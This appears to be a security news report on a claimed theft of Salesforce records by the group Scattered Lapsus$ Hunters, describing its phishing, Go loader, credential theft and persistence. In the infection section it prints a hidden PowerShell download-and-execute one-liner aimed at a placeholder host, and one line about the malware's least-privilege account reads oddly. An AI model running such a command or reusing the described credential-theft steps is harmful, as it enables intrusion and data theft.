Scattered Lapsus$ Hunters, a threat group previously associated with high-profile data thefts, recently claimed responsibility for exfiltrating over one billion records from Salesforce environments worldwide.
Emerging in mid-2025, the group has honed its tactics to exploit misconfigurations in cloud identities and exposed APIs.
Initial reports surfaced when multiple Salesforce customers observed anomalous queries against their customer relationship management (CRM) instances late at night, suggesting the presence of an automated extraction tool.
As forensic logs accumulated, investigators realized that the volume and scope of data accessed far exceeded previous intrusions.
In this latest campaign, attackers leveraged a combination of targeted phishing lures and credential stuffing to gain initial footholds.
.webp "Scattered Lapsus$ Hunters Claim to Have Stolen More Than 1 Billion Salesforce Records 2")
Victims reported receiving authentic-looking emails prompting mandatory security updates, which delivered a malicious Office macro.
Once executed, the macro reached out to a remote command-and-control server to install a lightweight loader.
Palo Alto Networks analysts noted that this loader was written in Go and compiled with stripped symbols, making reverse engineering more challenging.
The loader subsequently validated API tokens and initiated a multi-stage data harvesting routine.
The impact of this breach extends beyond exposed personal data; proprietary sales strategies, pipeline forecasts, and sensitive client negotiations have all come under threat.
Many organizations rely heavily on Salesforce for mission-critical operations, meaning any compromise can lead to operational disruptions and reputational harm.
Early estimates suggest that the group may have extracted data at a sustained rate of over 500 gigabytes per hour, exfiltrating records in batches via encrypted channels to avoid detection.
Infection Mechanism
A closer look at the infection mechanism reveals a strategic emphasis on stealth and persistence.
After the initial macro dropper executes, a PowerShell script stager is launched through a one-liner such as:-
powershell -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& {IEX ((New-Object Net.WebClient).DownloadString('https://cdn.example.com/stager.ps1'))}"This stager checks for sandbox indicators before retrieving the full Go-based loader. The loader then decrypts credentials stored in the Windows Credential Manager using the CredRead API and authenticates to the Salesforce REST API with the lowest-privilege service account that meets the data access requirements.
Once authenticated, the malware enumerates object schemas and dynamically constructs SOQL queries to retrieve and batch records. Each batch is buffered in memory and encrypted with ChaCha20 before being transmitted over HTTPS to a dedicated exfiltration endpoint.
To ensure persistence, the malware registers a scheduled task named UpdaterSvc that triggers every two hours. This task validates the presence of the loader binary, re-downloads it if altered, and resumes extraction from the last successful record ID.
The group’s meticulous approach to API rate-limit evasion and credential harvesting underscores an advanced understanding of cloud-native environments.
By combining sophisticated social engineering, custom tooling, and resilient persistence tactics, Scattered Lapsus$ Hunters have demonstrated a formidable capability to compromise enterprise Salesforce instances at scale.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
